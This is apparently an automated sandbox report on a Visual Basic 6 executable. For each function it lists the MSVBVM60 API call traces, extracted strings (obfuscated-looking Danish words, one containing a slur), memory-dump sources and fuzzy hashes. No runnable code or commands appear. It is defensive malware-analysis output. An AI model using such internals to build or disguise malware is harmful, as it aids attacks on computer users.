__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041E571
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000C0), ref: 0041E59B
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041E5B4
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041E5D9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000C8), ref: 0041E606
__vbaStrI2.MSVBVM60(?,Version ), ref: 0041E61B
__vbaStrMove.MSVBVM60 ref: 0041E622
__vbaStrCat.MSVBVM60(00000000), ref: 0041E625
__vbaStrMove.MSVBVM60 ref: 0041E62C
__vbaStrCat.MSVBVM60(0041C314,00000000), ref: 0041E634
__vbaStrMove.MSVBVM60 ref: 0041E63B
__vbaStrI2.MSVBVM60(?,00000000), ref: 0041E642
__vbaStrMove.MSVBVM60 ref: 0041E649
__vbaStrCat.MSVBVM60(00000000), ref: 0041E64C
__vbaStrMove.MSVBVM60 ref: 0041E653
__vbaStrCat.MSVBVM60(0041C314,00000000), ref: 0041E65B
__vbaStrMove.MSVBVM60 ref: 0041E662
__vbaStrI2.MSVBVM60(?,00000000), ref: 0041E66C
__vbaStrMove.MSVBVM60 ref: 0041E673
__vbaStrCat.MSVBVM60(00000000), ref: 0041E676
__vbaVarLateMemSt.MSVBVM60(?,Caption), ref: 0041E6A8
__vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0041E6C8
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041E6DC
__vbaFreeVar.MSVBVM60 ref: 0041E6EE
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041E703
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041E728
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000060), ref: 0041E74C
__vbaVarLateMemSt.MSVBVM60(?,Caption), ref: 0041E786
__vbaFreeObj.MSVBVM60 ref: 0041E78B
__vbaFreeVar.MSVBVM60 ref: 0041E794
__vbaFreeVar.MSVBVM60(0041E7F3), ref: 0041E7EB
__vbaFreeVar.MSVBVM60 ref: 0041E7F0

Strings

Caption, xrefs: 0041E693, 0041E76A
About , xrefs: 0041E47F
Version , xrefs: 0041E615

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$Move$New2$List$Late
String ID: About $Caption$Version
API String ID: 2652319797-2818086185
Opcode ID: 4b483d554745248ad95a73765f8c5a8eb2ab3fde1f70b308d32b0ab875829bea
Instruction ID: 9e4d474a8e294db2507eb257a92b6946c5d0aa0ec29416ed85690fdd17d78f2c
Opcode Fuzzy Hash: 4b483d554745248ad95a73765f8c5a8eb2ab3fde1f70b308d32b0ab875829bea
Instruction Fuzzy Hash: 96D16EB4A40209AFDB00DFA5DD88EDEBBB9FF58700B10412AF505E72A0DB749945CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041F850, Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 414COMMON

Download Yara Rule

APIs

#672.MSVBVM60(00000000,40080000,00000000,3FF00000,00000000,3FF00000,00000000,3FF00000), ref: 0041F8E7
__vbaFpR8.MSVBVM60 ref: 0041F8ED
#680.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,40490000,?,?,?), ref: 0041F93E
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041F954
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041F970
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041F99B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000060), ref: 0041F9C3
__vbaStrMove.MSVBVM60 ref: 0041F9CE
__vbaFreeObj.MSVBVM60 ref: 0041F9D7
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041F9EF
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041FA14
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000078), ref: 0041FA37
__vbaFreeObj.MSVBVM60 ref: 0041FA3C
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041FA54
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041FA79
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000130), ref: 0041FA9F
__vbaStrMove.MSVBVM60 ref: 0041FAAA
__vbaFreeObj.MSVBVM60 ref: 0041FAB3
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041FACB
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041FAF0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000110), ref: 0041FB16
__vbaStrMove.MSVBVM60 ref: 0041FB21
__vbaFreeObj.MSVBVM60 ref: 0041FB2A
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041FB42
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041FB67
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000B8), ref: 0041FB90
__vbaFreeObj.MSVBVM60 ref: 0041FB95
#690.MSVBVM60(Analyserne,Faggoty1,WHAN,RETSFORFLGELSENS), ref: 0041FBAF
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041FBC8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FBE1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,00000198), ref: 0041FC0B
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041FC1F
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000044), ref: 0041FD04
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041FD3B
__vbaFreeObj.MSVBVM60 ref: 0041FD44
__vbaFreeVar.MSVBVM60 ref: 0041FD4D
__vbaFreeObj.MSVBVM60(0041FDAB), ref: 0041FD8F
__vbaFreeStr.MSVBVM60 ref: 0041FD9E
__vbaFreeStr.MSVBVM60 ref: 0041FDA3
__vbaFreeStr.MSVBVM60 ref: 0041FDA8

Strings

Analyserne, xrefs: 0041FBAA
Faggoty1, xrefs: 0041FBA5
RETSFORFLGELSENS, xrefs: 0041FB9B
WHAN, xrefs: 0041FBA0
SKAGS, xrefs: 0041FCE1

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$Move$#672#680#690LateList
String ID: Analyserne$Faggoty1$RETSFORFLGELSENS$SKAGS$WHAN
API String ID: 1830049070-1073787339
Opcode ID: 10bb4586c31a7163b8df31bb5b6b9fc27eed6e4bd201ce9d2930cb43a5c787fd
Instruction ID: 37370e4a99ccd965547789cd16b9886d87194e6f0d0d531b9d896c4da0f24ab0
Opcode Fuzzy Hash: 10bb4586c31a7163b8df31bb5b6b9fc27eed6e4bd201ce9d2930cb43a5c787fd
Instruction Fuzzy Hash: 8CF13CB0E40219AFCB14DFA4DC84ADDBBB5FF58305F20816AE509E72A1D7745886CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E810, Relevance: 36.2, APIs: 24, Instructions: 173COMMON

Download Yara Rule

APIs

#632.MSVBVM60(?,?,00000000,?), ref: 0041E8A9
__vbaStrVarVal.MSVBVM60(?,?), ref: 0041E8B7
#516.MSVBVM60(00000000), ref: 0041E8BE
__vbaFreeStr.MSVBVM60 ref: 0041E8D2
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041E8E2
#617.MSVBVM60(00000002,?,?), ref: 0041E90C
#617.MSVBVM60(00000002,?,?), ref: 0041E933
__vbaStrVarMove.MSVBVM60(00000002), ref: 0041E93D
__vbaStrMove.MSVBVM60 ref: 0041E948
__vbaFreeVar.MSVBVM60 ref: 0041E951
__vbaI4Var.MSVBVM60(?), ref: 0041E961
__vbaStrToAnsi.MSVBVM60(?,?,?), ref: 0041E97B
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000), ref: 0041E990
__vbaI4Var.MSVBVM60(?,00000000,?,00000000,?,00000000), ref: 0041E997
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0041E9A1
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000), ref: 0041E9B2
__vbaVarCopy.MSVBVM60(?,00000000,?,00000000), ref: 0041E9D1
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000), ref: 0041E9DF
__vbaVarMove.MSVBVM60(?,00000000,?,00000000), ref: 0041E9F6
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,?,00000000), ref: 0041EA06
__vbaFreeVar.MSVBVM60(0041EA59,?,?,00000000), ref: 0041EA43
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 0041EA48
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 0041EA4D
__vbaFreeStr.MSVBVM60(?,?,00000000), ref: 0041EA52

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#617AnsiListUnicode$#516#632CopyErrorSystem
String ID:
API String ID: 2884289542-0
Opcode ID: 710ac1cc7b42445dc8530192f94292157d36740529efb235e756e21f9608266e
Instruction ID: 3b63e64c9d87e29209db17615ca97dcdad15d0288a5fceed70330e37cd8203b5
Opcode Fuzzy Hash: 710ac1cc7b42445dc8530192f94292157d36740529efb235e756e21f9608266e
Instruction Fuzzy Hash: C371F6B5C002199FDB14DFA5DD84ADDFBB8FF88304F10815AE50AA7224DB746A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00420230, Relevance: 28.7, APIs: 19, Instructions: 238COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00420289
__vbaObjSet.MSVBVM60(?,00000000), ref: 004202A8
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 004202BF
__vbaObjSet.MSVBVM60(?,00000000), ref: 004202D8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,00000170), ref: 00420301
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000001EC), ref: 0042034A
__vbaFreeStr.MSVBVM60 ref: 0042034F
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042035F
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0042037B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420394
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000000E0), ref: 004203B7
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 004203CC
__vbaObjSet.MSVBVM60(?,00000000), ref: 004203E5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,00000204), ref: 00420474
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420484
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 004204A0
__vbaObjSet.MSVBVM60(?,00000000), ref: 004204B9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C56C,00000110), ref: 004204E0
__vbaFreeObj.MSVBVM60 ref: 004204EF

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresultNew2$Free$List
String ID:
API String ID: 191279167-0
Opcode ID: b2e7c93401f1a76cf467abdbcfa4bea6573d9b274fbd592eddd6a4b12cb9c9d0
Instruction ID: 1c8ffb9f8754a05481df741ef04a031bd358440136ff0387472566c784596098
Opcode Fuzzy Hash: b2e7c93401f1a76cf467abdbcfa4bea6573d9b274fbd592eddd6a4b12cb9c9d0
Instruction Fuzzy Hash: 7C914E70A00218AFCB15DFA8DD89FAABBF8FF48700F108469E505E7361D7749941CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDD0, Relevance: 28.7, APIs: 19, Instructions: 219COMMON

Download Yara Rule

APIs

#702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041FE33
__vbaStrMove.MSVBVM60 ref: 0041FE3E
__vbaFreeVar.MSVBVM60 ref: 0041FE47
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041FE60
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FE7F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C338,00000158), ref: 0041FEA2
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041FEBB
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FED4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,00000204), ref: 0041FF6D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041FF7D
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041FF99
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FFB8
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041FFD4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FFED
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C328,00000198), ref: 00420010
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000001EC), ref: 00420050
__vbaFreeStr.MSVBVM60 ref: 00420059
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420069
__vbaFreeStr.MSVBVM60(004200AA), ref: 004200A3

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$List$#702Move
String ID:
API String ID: 2162597328-0
Opcode ID: 040a041879a0f4218a25492db1e59c014cc9171130d84dfee934099175ffcfb4
Instruction ID: 61df15d877eb089602405cff6ea7be37bdd6f2846dc5f89c8a896a5a32d02b7b
Opcode Fuzzy Hash: 040a041879a0f4218a25492db1e59c014cc9171130d84dfee934099175ffcfb4
Instruction Fuzzy Hash: E4815E70A00208AFCB14DFA8DD89F9ABBB8FF49700F108169F519E73A1D7759946CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042A010, Relevance: 28.7, APIs: 19, Instructions: 157COMMON

Download Yara Rule

APIs

__vbaCyI2.MSVBVM60(00000001), ref: 0042A066
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042A087
__vbaStrCy.MSVBVM60(00000000,?,0041C82C), ref: 0042A09E
__vbaStrMove.MSVBVM60 ref: 0042A0A9
__vbaStrCat.MSVBVM60(00000000), ref: 0042A0B0
__vbaStrMove.MSVBVM60 ref: 0042A0BB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,00000054), ref: 0042A0D8
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0042A0E8
__vbaFreeObj.MSVBVM60 ref: 0042A0F4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042A108
__vbaStrCy.MSVBVM60(?,?,0041C58C), ref: 0042A13F
__vbaStrMove.MSVBVM60 ref: 0042A14A
__vbaStrCat.MSVBVM60(00000000), ref: 0042A151
__vbaStrMove.MSVBVM60 ref: 0042A15C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000001EC), ref: 0042A17C
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0042A18C
__vbaFreeObj.MSVBVM60 ref: 0042A198
__vbaHresultCheckObj.MSVBVM60(00000000,00401330,0041BB70,000002B4), ref: 0042A1B9
__vbaFpCmpCy.MSVBVM60(?,?), ref: 0042A1CD

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$CheckHresult$List
String ID:
API String ID: 890835711-0
Opcode ID: 7de2ef56a9b5b6d445aa1d470c02758474a54fc0dd7b9111599cae72e25a62ac
Instruction ID: 5d8f41b033f547a22ecdef87c2bd39d127c61e47bf48685fdd108d8bb6fd0526
Opcode Fuzzy Hash: 7de2ef56a9b5b6d445aa1d470c02758474a54fc0dd7b9111599cae72e25a62ac
Instruction Fuzzy Hash: A6512E71A00209AFC7049FA4DE89AEEBBB8FF0C701F148129F945F7261DB349945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00428CF0, Relevance: 25.7, APIs: 17, Instructions: 207COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00428D3C
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00428D55
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428D74
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,00000158), ref: 00428D97
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00428DB0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428DC9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C348,000001E4), ref: 00428E56
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00428E66
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00428E82
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428EA1
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00428EBD
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428ED6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C328,00000048), ref: 00428EF3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000001EC), ref: 00428F33
__vbaFreeStr.MSVBVM60 ref: 00428F3C
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00428F4C
__vbaFreeStr.MSVBVM60(00428F84), ref: 00428F7D

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$List$Copy
String ID:
API String ID: 1781121178-0
Opcode ID: 58db5851f6a9e2aa14a7bca8ac55826374952ed6c4a2acb16a8ae43fe9a21d17
Instruction ID: a2a00705b3d9f27f17ab9f16957318283173ed53f6e2ba379a0676fc4d006940
Opcode Fuzzy Hash: 58db5851f6a9e2aa14a7bca8ac55826374952ed6c4a2acb16a8ae43fe9a21d17
Instruction Fuzzy Hash: A9814CB0A00218AFCB04DFA8D989F9EBBB8FF48700F10856DE505E7351D7359946CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00429920, Relevance: 25.6, APIs: 17, Instructions: 148COMMON

Download Yara Rule

APIs

#594.MSVBVM60(?), ref: 0042996C
__vbaFreeVar.MSVBVM60 ref: 00429975
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0042998E
__vbaObjSet.MSVBVM60(?,00000000), ref: 004299AD
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 004299D2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004299EB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C720,00000048), ref: 00429A08
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C338,000001EC), ref: 00429A49
__vbaFreeStr.MSVBVM60 ref: 00429A52
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00429A62
#707.MSVBVM60(00000001,00000000), ref: 00429A6F
__vbaStrMove.MSVBVM60 ref: 00429A7A
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00429A93
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429AAC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C40C,00000068), ref: 00429AC9
__vbaFreeObj.MSVBVM60 ref: 00429AD8
__vbaFreeStr.MSVBVM60(00429B16), ref: 00429B0F

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#594#707ListMove
String ID:
API String ID: 2949391266-0
Opcode ID: b77c8bc1060e72ddf29c665f75b8fb88064a58b0e119ef9ce970ee6f2af9bcf6
Instruction ID: c0caab5d5f17cbb3b86649ad4d3803f059e342f5091dad5fd32a2bc607f30864
Opcode Fuzzy Hash: b77c8bc1060e72ddf29c665f75b8fb88064a58b0e119ef9ce970ee6f2af9bcf6
Instruction Fuzzy Hash: 3B5139B0A40318AFCB14DFA4DD89FAE7BB8FB48701F108029F441A72A1D7745941CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041F610, Relevance: 24.2, APIs: 16, Instructions: 169COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F65A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F679
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F690
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F6A9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,00000048), ref: 0041F6C6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C338,000001EC), ref: 0041F70B
__vbaFreeStr.MSVBVM60 ref: 0041F714
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041F724
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F740
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F759
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,000001E8), ref: 0041F77E
__vbaFreeObj.MSVBVM60 ref: 0041F791
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041F7A6
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041F7CB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000108), ref: 0041F7F1
__vbaFreeObj.MSVBVM60 ref: 0041F7F6

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$List
String ID:
API String ID: 3473554973-0
Opcode ID: 5a675a062ed2f80e2e615862e574737e2b0d43b6ee46d4b074cffea09795dbfd
Instruction ID: 718c260e5d98e997187a8167dd0469fe2dddccca854fed8684b633d4cb4b9e97
Opcode Fuzzy Hash: 5a675a062ed2f80e2e615862e574737e2b0d43b6ee46d4b074cffea09795dbfd
Instruction Fuzzy Hash: 13517170A40218AFCB10DFA8DD89FEE77B8FB48700F104469F545F72A1D774A9468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004224E0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00422523
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00422542
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C40C,000001A8), ref: 00422561
__vbaFreeObj.MSVBVM60 ref: 0042256A
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00422583
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0042259C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C338,000001EC), ref: 004225E0
__vbaFreeObj.MSVBVM60 ref: 004225EF
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00422604
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0042261D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,000001D4), ref: 0042263C
__vbaFreeObj.MSVBVM60 ref: 00422645

Strings

Domspraksisernes5, xrefs: 004225AF

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: Domspraksisernes5
API String ID: 1645334062-1971972423
Opcode ID: 84b337afc1a1581deb58eb12290dec22e3f1ea31101c4050fcc73e9b954f29fe
Instruction ID: 7ae1173f5d2f8a870f1c1551a7c1fe4c4310adeda4e7feb34c68db144c5c299e
Opcode Fuzzy Hash: 84b337afc1a1581deb58eb12290dec22e3f1ea31101c4050fcc73e9b954f29fe
Instruction Fuzzy Hash: 4F419D70740319ABD710EF64DE89FAA7BA8EF18701F504429F841F72A1D7B899418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420F00, Relevance: 18.1, APIs: 12, Instructions: 91COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00401346), ref: 00420F40
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00401346), ref: 00420F48
__vbaNew2.MSVBVM60(0041CAC0,0042B010,?,?,?,?,?,?,?,?,?,00401346), ref: 00420F5D
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00401346), ref: 00420F7C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C338,000001E8,?,?,?,?,?,?,?,?,?,00401346), ref: 00420F9B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00401346), ref: 00420FAA
__vbaNew2.MSVBVM60(0041CAC0,0042B010,?,?,?,?,?,?,?,?,?,00401346), ref: 00420FBF
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00401346), ref: 00420FD8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C3FC,000000C4,?,?,?,?,?,?,?,?,?,00401346), ref: 00420FF7
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00401346), ref: 00421000
__vbaFreeStr.MSVBVM60(0042102B), ref: 00421023
__vbaFreeStr.MSVBVM60 ref: 00421028

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckCopyHresultNew2
String ID:
API String ID: 4138333463-0
Opcode ID: 5da2c23f720effbd1f60fa15ca1664a4ab6a6fcc47e780782644021d24723638
Instruction ID: e9ff65c06c2645ecdf35d1341f5c5707c7186867e91e91aabe9eb39c557ac1ef
Opcode Fuzzy Hash: 5da2c23f720effbd1f60fa15ca1664a4ab6a6fcc47e780782644021d24723638
Instruction Fuzzy Hash: F6318070A40219ABCB10DF64DD85FEE7BB8FF18700F50442AE941F72A1D7786945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041F490, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F4D3
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F4F2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,000001C8), ref: 0041F537
__vbaFreeObj.MSVBVM60 ref: 0041F540
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F559
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F572
